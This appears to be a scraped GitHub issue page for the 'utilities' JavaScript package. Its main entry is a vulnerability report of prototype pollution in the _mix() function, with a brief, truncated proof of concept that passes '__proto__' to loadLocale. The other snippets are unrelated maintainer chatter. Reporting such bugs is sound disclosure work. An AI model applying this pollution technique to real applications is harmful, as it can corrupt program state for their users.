utilities

utilities copied to clipboard

Prototype Pollution using utilities.i18n.loadLocale()

10

Hi,There's a prototype pollution vulnerability in function _mix() in utilities/lib/core.js, the risk locate is in here: https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L65 https://github.com/mde/utilities/blob/ba6be1fd1abe7541f5965c0bf831f127e42da815/lib/core.js#L41 and the POC is: var utilities = require("utilities") bad_objects= {test:"123"} console.log("Before:"+{}.test) utilities.i18n.loadLocale("__proto__",bad_objects,{},true)...

lelecolacola123

Hey @mde I brought this up in IRC yesterday and thought I would dig into it a little more to see if there was something I could fix or file...

socketwiz

mde

``` I think they're just asking about custom logging. Yeah maybe. Which we don't support yet. I was going to attack the logging, until we bumped the auth stuff up....

larzconwell

OKEAMAH